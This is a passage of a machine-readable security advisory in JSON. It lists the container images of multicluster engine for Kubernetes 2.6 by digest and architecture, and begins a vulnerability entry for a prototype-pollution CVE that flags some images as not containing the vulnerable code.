multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:ed9963c1c0f2535aa753ecf341ab45890c838c49719b189fa1149ce5a36f244c_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:f88156d91c826636ffbff092da3733a06f49f210d3f45c20b3d145b8033d3a14_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:fb23549a45050af95855906f65732389237ed6e907974600ee5f02fda696c7a7_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:08236bbe9754e0d9e8e11c1486fe81134ed8cb392f8157a9267e22823662fe83_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:3ef0376735304b9a8d46648aacc84adffbe3424d2ad790cbfd3a10888d60b54d_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:6ae974b35acc19fad0a42f0452bdb13d4d736ed59e3c9ce1ff448456f8f8cf3b_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:cd44c903b5ce3fc9f9c93be883f2a5c6106d1d86ad5a3596f8cb1ccb8ddc316c_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:48408e0a5ec56b32fb9cfddf696c91b3fa1890679643959f3b12ddf746ddfe40_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6ebdb26020f475f5a9066777ea8aeb0bc6a99f93db9a7e6d1e0a6272528ce8e7_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:c67a2dc59ec90f77f8de8e72d4130f181e0ced37aba0a2b71d438e9221fd53fe_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:f076915d0170bd2a3ae4552c9a2199dcab7016f0fe4f9e6d027a474a81dffa44_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:08b253bbac766546380de11c4eb330ab1da4cf45bace66296d6ce71a46052ccc_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:3ed63b7040f9f2e43f3034c0b1ecd3479b6fb1e9cb45f34b65c6ba2cc0fdc6e1_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:491acfe31e1ded0bd8b5e6d4ce5115a5e1ef4b0ea5165635abcb21055a3c9f41_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:e32f3082cbed11fd6e5f1f65b58d9e2ab52df3298ecc63ce32dea78fdf36150e_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:071caf0cee1f904aaf5747b5c894f8e68e273c76b045e2e46f3fdc747fde0b52_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:222fb4df168138dfe036cba15b0592b8d85aeb0a3907cbbcb80caa148ebd5e75_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:76e5532fdd70e237898a03f7ab0304d44684ac4d78930c04140558b780e44284_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:a7d81f1ca5781bad0fdf032192994d7aebb438b67370526b7aaf24de26ea2a4a_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:0389924d0daecd14270a2c80cf761400b2683b5d1f191ac63e09eddc33b6f459_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:54ec16d78dafc319cdd51ef6c7328ec9b6ad7fdf9cac5e4e47c1f510ad2a132a_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:8c81477e75d355483f39b88ddfdd30b8ea6982a45aeb3cdc178b53f6e9198334_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:969cc2b05bb0fe1b00cfa728b6b0a741bf21e81aecae04aba1e0bbdd1921faa5_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:55abc89b8554cc3e314cf9f7f998101a931c3cf9b3b21e0f0cdbe26d5aba1be6_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:855c5cd1036f4a3c38f35f6d781e3f31941c91d61b699f4b714cda909b81bf70_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cb3f786b682cc31995858194dec9dfdc1ac43f6a0ceb609364bbc07c732895e9_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:cc8fc81d0fb612703581e0df2f9b4262aae0d1f1af29a5facdf9dac567b95510_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2b24bab2c9db586e3de204607f606c1577ab35ef78ce9cb154b08d56a3cb70d3_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:65ee7dbee80ad40347972f9a42cb18cde25554211afbb6f0e2c1aca3405e11f2_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9ce62c421421c1c2739b1e79f010539134123583ebaef7274549ba49e1c0010a_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:9e7310305572d3bcbfca6bff55daa43a01039cc6384149b573c696335048e5a5_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3764ca1ef9ed913896c0449b271706748517cf96e67d88ad491e225fcb0eb549_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:cd74d39b219e499f077516f6c229cddff21cd480d4ef33033d644bdbfb0b3682_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d1b6093f101ae7e4956aad52d4de99c68472f86de3094c98fc4f290926a99f4a_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:e84d9e60025112bcc466c1ab0c8b82dccafc34b85266f5650ff6c4fbdd9ad6c5_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le"}, "product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:068f2fd00a2709d041c1eb2aab64ac4741a7a4b27475a722571a450ab496b655_ppc64le", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64"}, "product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:2c8f4c88f1ac9cd64359e990530e27ad8c3ff590e17aca5a072ef0ec674f380d_arm64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x"}, "product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:817d332d90af406985a0611de4a171f7478d39f0afa1a6aafb7cf5eb7616ca78_s390x", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}, {"category": "default_component_of", "full_product_name": {"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64 as a component of multicluster engine for Kubernetes 2.6", "product_id": "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64"}, "product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:b6b5e9e343849e851770dcdbf287b63de1a0cb8cec21cee9be2ef4fdcca445e3_amd64", "relates_to_product_reference": "multicluster engine for Kubernetes 2.6"}]}, "vulnerabilities": [{"cve": "CVE-2025-13465", "cwe": {"id": "CWE-1321", "name": "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')"}, "discovery_date": "2026-01-21T20:01:28.774829+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:407afc190324598e778fc09d218da552a2430612bad6b50ff9f6bc824b788dfc_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:437c27590382282a29dd543a69bbaed7ebd5421f73b98311c13f9e37c9ff553e_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:865fcb2f6796be98004ad84f0fffcd7200690f56ccccf5a39af4c5888abb213e_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f82ac0d043682cc16fb832d9027464ee65f314d70ce98687f45db50e16d2b250_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:0768996d28693025a487c86c72debf1fda095282412b2c33ca0f21d8d9011b8a_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5e84dda66a7735bbae425ac1a6b0e241662edb858476eb82adf72b7dff4b3916_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:9f13c6203d4ba9cde9bd8932b7e86c4a9c3396bb82235601b84f6743fb1b675f_ppc64le", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:ed05bbaa85197e21425ed8f503f74c6717bb6f2112e9b57c9b115071777c1995_s390x", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:2ec4baacabb144497ea62482a3c0ccafb9c3794c5c89f9aebbe855d7d9829dbe_amd64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:72e64e8d1be38857af7beadc81e2f5f071f636b1d9233a70add5a1f18833ec45_arm64", "multicluster engine for Kubernetes 2.6:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c17a0ffd9c9546016a87cdd75adbaaa742f8637a0d81975d7b76662ffe5b069d_ppc64le", "multicluster engine for Kubernetes 